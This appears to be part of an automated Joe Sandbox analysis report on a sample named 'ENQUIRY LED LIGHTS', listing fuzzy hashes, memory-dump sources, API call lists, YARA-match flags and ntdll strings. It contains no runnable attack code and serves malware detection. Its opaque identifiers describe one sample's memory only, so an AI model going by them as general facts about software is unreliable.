                                                                                                  • Opcode Fuzzy Hash: 4ac95618343af3cceb3770c204df7f2430c73b371630ed1e3ee2a22fd5b321ce
                                                                                                  • Instruction Fuzzy Hash: FA9002A1601500524140715888084176015D7E1381395C119A5554560C861989599269
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                                  • Instruction ID: 7de685362459f36af8abea0f67d18edfab4ff4c5ecd1a55534bd0166b45c483c
                                                                                                  • Opcode Fuzzy Hash: 40b4e426c641de10d74f2e7f8143e822a7fe089a7f20ae107f2def0b5e308659
                                                                                                  • Instruction Fuzzy Hash: E5900265221400120145B558460851B0455D7D63D1395C019F6416590CC62289695321
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                                  • Instruction ID: 98c28dbe82a6beec0a87781e7aec6e4828bbd8e0555aceba1882b078099c8ce5
                                                                                                  • Opcode Fuzzy Hash: 29147128e383488fc9352995b98b5d4f5548dd0fd36450c37cba28258385d707
                                                                                                  • Instruction Fuzzy Hash: B4900475311400130105F55C470C5170057C7D53D1355C035F7015550CD733CD755131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e91113542b96de8011ccf43e4d5e6d98c5211bcaf8a1534d2dccab2fa19a1d3
                                                                                                  • Instruction ID: 90dfd5095069289e55918d8494e32b8d9ecd24e4ed8c08668c61a7d1b80a028a
                                                                                                  • Opcode Fuzzy Hash: 2e91113542b96de8011ccf43e4d5e6d98c5211bcaf8a1534d2dccab2fa19a1d3
                                                                                                  • Instruction Fuzzy Hash: 879002E1201540A24500B258C408B1B4515C7E0281B55C01AE6054560CC52689559135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                                  • Instruction ID: eb98cce755a9c25b058a6c3e0a00fb4ab0df1642940227a619dde7bc8ed5580f
                                                                                                  • Opcode Fuzzy Hash: 5a29736b8b0e161cd86e0e06c55e466c5394126f1d3ddf9d5f6beeba9392775f
                                                                                                  • Instruction Fuzzy Hash: B590027120140812D1807158840865B0015C7D1381F95C019A5025654DCA168B5D77A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                                  • Instruction ID: 89a3c2d78a0a6ceb4ac2057b31f4e7ea35b98db82cd3bb27d6ad33adfb2b772f
                                                                                                  • Opcode Fuzzy Hash: d3dd5c4f9fbe7faa96f440213c75d1afffc946f9b8126f22009bcf4dad6cb44a
                                                                                                  • Instruction Fuzzy Hash: 8F90027120544852D14071588408A570025C7D0385F55C015A5064694D96268E59B661
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                                  • Instruction ID: 4fa97e9be4aefabeafca2329e5a85b750fdea643ae824063e2ec48dab5c1ae37
                                                                                                  • Opcode Fuzzy Hash: 321ab38c005c3c84fba2d1eb6ffd7e1f8d4475ea7033ff6588c1fcbb0033917b
                                                                                                  • Instruction Fuzzy Hash: DB90027160540812D150715884187570015C7D0381F55C015A5024654D87568B5976A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 89b474627aacbd5eb9e0f60d71bfca1bcab5b99f8add269c719d197c930f0975
                                                                                                  • Instruction ID: 20df5f81fcae39590cb20fe8e2fb7d427bd0f0e40031111f76340a9c2c1da8c5
                                                                                                  • Opcode Fuzzy Hash: 89b474627aacbd5eb9e0f60d71bfca1bcab5b99f8add269c719d197c930f0975
                                                                                                  • Instruction Fuzzy Hash: 3E90027120140812D104715888086970015C7D0381F55C015AB024655E966689957131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                                  • Instruction ID: 32400a6bbb5abb7cba4e54b87e49f1f87c53197ffd700f3cc1584bd865ec5323
                                                                                                  • Opcode Fuzzy Hash: 58379faf74a51e468f35f462814214f6b2e91b526020fe83cf85c29b13639329
                                                                                                  • Instruction Fuzzy Hash: A29002A120180413D140755888086170015C7D0382F55C015A7064555E8A2A8D556135
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a82c4543cde1b277530b4aad5f5ea51dd08ea8f8f8d4a944aa4f6fffb0c92a3f
                                                                                                  • Instruction ID: df8f85a59c75b4be621a1dbb6801a87a6a442a2f3c5dde123dea73f754b4b361
                                                                                                  • Opcode Fuzzy Hash: a82c4543cde1b277530b4aad5f5ea51dd08ea8f8f8d4a944aa4f6fffb0c92a3f
                                                                                                  • Instruction Fuzzy Hash: 019002B120140412D140715884087570015C7D0381F55C015AA064554E865A8ED96665
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                                  • Instruction ID: d2314a58ad9cac7509259bd10e5f0c7ba189605dae8435e54b82dc29f46f30cf
                                                                                                  • Opcode Fuzzy Hash: 00fc0c8714c28f41c69c8afc5a7a613656caee28af8ae0f0c6b623448059de90
                                                                                                  • Instruction Fuzzy Hash: 1890026160140512D10171588408627001AC7D02C1F95C026A6024555ECA268A96A131
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcf0ee76627e846f182056b143a096fab0e2af9836450baa71a954c5a133be76
                                                                                                  • Instruction ID: 58820a2510eed30de118ad55fb011b598392b59177dcf9632bfd7052265610b7
                                                                                                  • Opcode Fuzzy Hash: dcf0ee76627e846f182056b143a096fab0e2af9836450baa71a954c5a133be76
                                                                                                  • Instruction Fuzzy Hash: 2A90026130140412D102715884186170019C7D13C5F95C016E6424555D86268A57A132
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                                  • Instruction ID: 7871af7120aed2198d8362311d5d7750803c14f2102dfe6d68af1b15941a14c4
                                                                                                  • Opcode Fuzzy Hash: 5a84e06a6b95ce20b48ae13393e05308d9dbe2ad1c8d1868d5bf5035ed47674d
                                                                                                  • Instruction Fuzzy Hash: 1F900261211C0052D20075688C18B170015C7D0383F55C119A5154554CC91689655521
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                                  • Instruction ID: 1c4062bd518a3475ddb63f8d394ff504e74e2cac73053e4b5ba2c160aa1b9cf6
                                                                                                  • Opcode Fuzzy Hash: ae7a3bf17b049e7669c2ad5acc63d1e06f8f952a515e713b8efca1c063f5f2cd
                                                                                                  • Instruction Fuzzy Hash: E49002616014005241407168C8489174015EBE1291755C125A5998550D855A89695665
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4dfc752107c8675ec81f04184e262167105a211c219d084a077964150daa6201
                                                                                                  • Instruction ID: c9b9dc6f1b88b35bc4b7d78308c97fcc005be4a797c08ba8aff9e122e3711ccb
                                                                                                  • Opcode Fuzzy Hash: 4dfc752107c8675ec81f04184e262167105a211c219d084a077964150daa6201
                                                                                                  • Instruction Fuzzy Hash: 4490027120180412D1007158880C7570015C7D0382F55C015AA164555E8666C9956531
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cee6feff8984d67e6956b796c64de3d7eaf48faeb657f8254dbc23292c5b25dd
                                                                                                  • Instruction ID: 5c78ae1d1771057da53ed6a9c4d2b981efbbefcdf808a1f59b75c24df466d54b
                                                                                                  • Opcode Fuzzy Hash: cee6feff8984d67e6956b796c64de3d7eaf48faeb657f8254dbc23292c5b25dd
                                                                                                  • Instruction Fuzzy Hash: E690027120180412D1007158881871B0015C7D0382F55C015A6164555D862689556571
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9dfaaa86c8156e74bfd75237fffd370d68e25c515704dd41ee51b396f1164c45
                                                                                                  • Instruction ID: 47a34aeb60da250f761926dd3aec1173b1edfe79400d331e8b783e6e20feb88e
                                                                                                  • Opcode Fuzzy Hash: 9dfaaa86c8156e74bfd75237fffd370d68e25c515704dd41ee51b396f1164c45
                                                                                                  • Instruction Fuzzy Hash: 659002A121140052D104715884087170055C7E1281F55C016A7154554CC52A8D655125
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                                  • Instruction ID: 17f2daef2404eb9418128504c42eaab271fc60962944ea59d058feb4d1875410
                                                                                                  • Opcode Fuzzy Hash: 4d683354123d4d9525d22a9b37852d021bd0b0271c07b772e0eb06fd36213716
                                                                                                  • Instruction Fuzzy Hash: EB9002A134140452D10071588418B170015C7E1381F55C019E6064554D861ACD566126
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5bf26fdc6637fa840bfa3cdb3f37123c6a8039f8d9db4ff9f82de1258c963eb3
                                                                                                  • Instruction ID: 6639a5bced26394a9a51e2775a46f6ac30492baf6c4b5d03e8f56177fc0a3127
                                                                                                  • Opcode Fuzzy Hash: 5bf26fdc6637fa840bfa3cdb3f37123c6a8039f8d9db4ff9f82de1258c963eb3
                                                                                                  • Instruction Fuzzy Hash: F390047130140413D100715CD50C7170015C7D03C1F55D415F543455CDD757CD557131
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                                  • Instruction ID: 63427479568e4741da062ac045f815e4d75df8d6dd93f94952f8b71f7b9f34c6
                                                                                                  • Opcode Fuzzy Hash: 250d1e73101bacc3504159d887fc8a6f6ef9400bed6aa6911e3cb4310ae82f3c
                                                                                                  • Instruction Fuzzy Hash: 5151E7B2E041267EDB10DB9888D097EF7B8FB08285710826AEF65D7641D734DE40DBA0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                  • API String ID: 48624451-2108815105
                                                                                                  • Opcode ID: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                                  • Instruction ID: 953fd86c738600ce16ea98f3201d61e1dcd6d66e1969d50a9844da6ee3ec64f6
                                                                                                  • Opcode Fuzzy Hash: 63a6dd40e4b4f9ef1768933ea758d5f2d4f24ea3ab61cabec993e49c52d0bbe1
                                                                                                  • Instruction Fuzzy Hash: A751F675A00646AFDB20DE5CCE9097FB7F9EB44280B24885DEA96D7781DB74DA00CB60
                                                                                                  APIs
                                                                                                  • LoadStringW.USER32(?,00000067,0044F960,00000064), ref: 00401051
                                                                                                  • LoadStringW.USER32(?,0000006D,0044F898,00000064), ref: 0040105D
                                                                                                  • LoadAcceleratorsW.USER32(?,0000006D), ref: 004010AD
                                                                                                  • GetMessageW.USER32(?,00000724,00000724,00000724), ref: 004010F3
                                                                                                  • TranslateAcceleratorW.USER32(?,00007EE2,?), ref: 00401139
                                                                                                  • TranslateMessage.USER32(?), ref: 00401147
                                                                                                  • DispatchMessageW.USER32(?), ref: 00401171
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040119B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Load$StringTranslate$AcceleratorAcceleratorsDispatch
                                                                                                  • String ID: gfff$~
                                                                                                  • API String ID: 1345915193-1825384750
                                                                                                  Strings
                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02F846FC
                                                                                                  • Execute=1, xrefs: 02F84713
                                                                                                  • ExecuteOptions, xrefs: 02F846A0
                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 02F84787
                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02F84655
                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02F84742
                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02F84725
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                  • API String ID: 0-484625025
                                                                                                  APIs
                                                                                                  • LoadIconW.USER32(?,0000006B), ref: 00401234
                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00401244
                                                                                                  • LoadIconW.USER32(?,0000006C), ref: 00401333
                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00401340
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Load$Icon$ClassCursorRegister
                                                                                                  • String ID: -$0$m$ra
                                                                                                  • API String ID: 4202395251-3710693456
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 004498A9
                                                                                                    • Part of subcall function 00447C6B: __getptd_noexit.LIBCMT ref: 00447C6E
                                                                                                    • Part of subcall function 00447C6B: __amsg_exit.LIBCMT ref: 00447C7B
                                                                                                  • __amsg_exit.LIBCMT ref: 004498C9
                                                                                                  • __lock.LIBCMT ref: 004498D9
                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 004498F6
                                                                                                  • _free.LIBCMT ref: 00449909
                                                                                                  • InterlockedIncrement.KERNEL32(0044E570), ref: 00449921
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                  • String ID: pD
                                                                                                  • API String ID: 3470314060-1597287149
                                                                                                  APIs
                                                                                                  • DefWindowProcW.USER32(00002BD0,?,?,?,00001935,00002430), ref: 004016B7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcWindow
                                                                                                  • String ID: 0$$2?$?$a$~
                                                                                                  • API String ID: 181713994-306211256
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: +$-$0$0
                                                                                                  • API String ID: 1302938615-699404926
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ___swprintf_l
                                                                                                  • String ID: %%%u$[$]:%u
                                                                                                  • API String ID: 48624451-2819853543
                                                                                                  APIs
                                                                                                  • GetMessageW.USER32(?,00000724,00000724,00000724), ref: 004010F3
                                                                                                  • TranslateAcceleratorW.USER32(?,00007EE2,?), ref: 00401139
                                                                                                  • TranslateMessage.USER32(?), ref: 00401147
                                                                                                  • DispatchMessageW.USER32(?), ref: 00401171
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040119B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Message$Translate$AcceleratorDispatch
                                                                                                  • String ID:
                                                                                                  • API String ID: 2755951552-0
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 0044A17A
                                                                                                    • Part of subcall function 0044A056: __FF_MSGBANNER.LIBCMT ref: 0044A06F
                                                                                                    • Part of subcall function 0044A056: __NMSG_WRITE.LIBCMT ref: 0044A076
                                                                                                    • Part of subcall function 0044A056: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,00448F11,?,00000001,?,?,00448331,00000018,0044C900,0000000C,004483C1), ref: 0044A09B
                                                                                                  • _free.LIBCMT ref: 0044A18D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocHeap_free_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 2734353464-0
                                                                                                  APIs
                                                                                                  • __getptd.LIBCMT ref: 0044960D
                                                                                                    • Part of subcall function 00447C6B: __getptd_noexit.LIBCMT ref: 00447C6E
                                                                                                    • Part of subcall function 00447C6B: __amsg_exit.LIBCMT ref: 00447C7B
                                                                                                  • __getptd.LIBCMT ref: 00449624
                                                                                                  • __amsg_exit.LIBCMT ref: 00449632
                                                                                                  • __lock.LIBCMT ref: 00449642
                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00449656
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_400000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                  • String ID:
                                                                                                  • API String ID: 938513278-0
                                                                                                  Strings
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02F802E7
                                                                                                  • RTL: Re-Waiting, xrefs: 02F8031E
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02F802BD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                  • API String ID: 0-2474120054
                                                                                                  Strings
                                                                                                  • RTL: Resource at %p, xrefs: 02F87B8E
                                                                                                  • RTL: Re-Waiting, xrefs: 02F87BAC
                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02F87B7F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
